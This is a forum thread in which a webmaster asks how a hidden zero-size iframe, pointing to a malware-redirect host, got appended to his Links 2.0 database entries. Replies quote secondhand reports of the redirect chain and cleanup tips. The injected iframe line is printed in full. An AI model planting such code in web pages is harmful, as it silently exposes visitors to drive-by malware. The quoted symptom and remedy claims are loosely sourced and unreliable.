Gossamer Forum
Home : Products : Links 2.0 : Discussions :

Links 2 hacked?

Quote Reply
Links 2 hacked?
I think my database has been hacked.

The description field of all but the last few entries has been appended with the following line of code.
<iframe src="http://x-traff.info/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

I can clean this out of the database but does anyone have any idea of how it was entered?
---
Will
Webmaster
FishHoo! Search Index for Fishermen
http://www.fishhoo.com/
Quote Reply
Re: [willdeb] Links 2 hacked? In reply to
Are you hosted at Network Solutions? Found these...
Quote:
That URL redirects to coripastares .com which in turn seems to use a
browser exploit to serve malware. You will need to remove that before
you submit a reconsideration request and make sure that all of your
pages are checked and cleaned for the same kind of issue. If you
Google for "x-traff .info" and "coripastares .com" (both without the
spaces I put in there to make sure you don't click on the links :-))
you will find other webmasters who have run into similar things on
their sites.
In general, this appears to have been left by someone who has gained
access to your site and/or server. You will probably want to follow up
on that and try to assess how they managed to gain access so that you
can fix the issue.
http://groups.google.com/...ead/48967466d1469c55


Quote:
(1) The hack is an <iframe> exploit that is currently affecting Network Solutions' UNIX servers ONLY. If you are using a Windows Server package, it's not a problem.

The hack is simple: somehow the hacker exploits a vulnerability in YaBB 2.1 to put <iframe> redirect links in the bottom of each Index page, throughout your site. That means, not just YaBB's indexes, but also any other index.php or index.html file anywhere in your FTP server.

The symptoms are these: the redirect points the browser to x-traffic.info, a spammer's site, which then redirects to coripastares.com, another spammer's site. It then loads a Java exploit which most virus scanners should have no problems with. However, somehow this exploit causes Firefox browsers on PCs only to type backwards. Every word becomes sdarwkcab, you follow me?

Macintoshes are vulnerable to the Javascript hack in both Safari and Firefox, but the script doesn't seem to do anything.

The solution in both cases for users is to clear the Java console memory. Not the Temporary Internet Files, but the JAVE CONSOLE files. This is accomplished in various ways, but basically just go to the Java engine's specific menu and find the clear cache button.

http://forum.joomla.org/...p?f=267&t=270479


Leonard
aka PerlFlunkie
Quote Reply
Re: [PerlFlunkie] Links 2 hacked? In reply to
No, not Network Solutions but I have the server admins working on finding the entry point. Thanks for the tip.
---
Will
Webmaster
FishHoo! Search Index for Fishermen
http://www.fishhoo.com/